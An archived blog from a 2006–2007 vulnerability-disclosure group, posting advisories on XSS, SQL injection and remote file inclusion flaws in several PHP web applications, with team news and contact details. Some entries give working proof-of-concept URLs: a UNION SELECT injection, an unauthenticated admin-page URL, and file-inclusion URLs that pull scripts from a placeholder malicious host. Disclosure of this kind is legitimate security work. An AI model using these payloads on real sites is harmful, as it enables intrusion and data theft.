UNSECURED SYSTEMS vol.2 blog

we have new blog pridels-team.blogspot.com
this blog will run only as archive, in new will be published fresh advisories and news from us.

DVDdb XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 2 May 2007
vendor:http://globalmegacorp.org/dvddb/
affected versions: 0.6 and previous
###############################################


DVDdb contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "movieid" parameter in "loan.php" and "s" parameter in "listmovies.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################

PHPChain vuln.

PHPChain vuln.
###############################################
Vuln. discovered by : r0t
Date: 2 May 2007
vendor:http://www.globalmegacorp.org/PHPChain/
affected versions: 1.0 and previous
###############################################

PHPChain contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "catid" parameter in "settings.php" and in "cat.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Also there is full path disclosure , "attacker" will get full installisations path by testing XSS examples in vuln. parameters.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################

FileRun Vuln.

###############################################
Vuln. discovered by : r0t
Date: 2 May 2007
vendor:http://filerun.dreamhosters.com/
affected versions: 1.0 and previous
###############################################

1.
FileRun contains a flaw that allows a remote sql injection attacks.Input passed to the "fid" parameter isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

2.
FileRun contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "page","module","section" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################

AlstraSoft Video Share Enterprise - Information disclosure & SQL injection vuln

============================
discovered by : VietMafia
developer's site: www.alstrasoft.com
script: AlstraSoft Video Share Enterprise
risk: medium
status: unpatched
============================

This script has a vuln which can be exploited by malicious people to disclose sensitive information & access to system as administrator.


1.The file siteadmin/useredit.php can be accessed without any authetication. User's info can be viewed & edited after that.

example:

http://host/path/siteadmin/useredit.php?uid=userid

2.SQL injection

after we got access as a registered user there's a sql inj vuln in msg.php file

poc : http://host/path/msg.php?id=-1%20union%20select%201,version(),1,1,1,1,1,1,1

thanks DH for helping me verify this. :)

===============================

come back

Der4444,

check ur email krustevs at gmail. I dont see you on icq.

Vietmafia

Crash.

Hello guys!
No new entries for long time , board is down more than half year.
Everthing looks dead, so it was also.
Lets say somebody from us had alot of jobs behind this scene other ones take some hollydays.
But now i think we can continue wht we had started.
I still miss contacts to Vietmafia and cembo,but guys if you read this post let me know if we can count of you in team.
Just mail me krustevs at gmail
or via icq 476010452

A Book A Day

From this day forward you will be able to find a new e-book about programming, every day. They are posted at our forums. E-books about other topics coming soon as well.

PhpHostBot remote File Inclusion Vuln.

###############################################
Vuln. discovered by : r0t
Date: 20 july 2006
vendor:www.idevspot.com/PhpHostBot.php
affected versions:PhpHostBot 1.0 / AutoHost 3.0
###############################################

Vulnerability Description:

PhpHostBot contains a flaw that allows a remote file inclusion,which can be exploited by malicious people to compromise a vulnerable system.
User input passed to the "page" parameter in "order/index.php" isn't properly verified before being used to include files. This can be exploited to include scripts from external resources by passing an URL to a remote site.

example:

http://[victim]/order/index.php?page=http://[malicious_site]/file

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

PhpLinkExchange remote File Inclusion Vuln.

###############################################
Vuln. discovered by : r0t
Date: 20 july 2006
vendor:www.idevspot.com/PhpLinkExchange.php
affected versions: 1.0 and prior
###############################################

Vulnerability Description:

PhpLinkExchange contains a flaw that allows a remote file inclusion,which can be exploited by malicious people to compromise a vulnerable system.
User input passed to the "page" parameter in "index.php" isn't properly verified before being used to include files. This can be exploited to include scripts from external resources by passing an URL to a remote site.

example:

http://[victim]/index.php?page=http://[malicious_site]/file

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/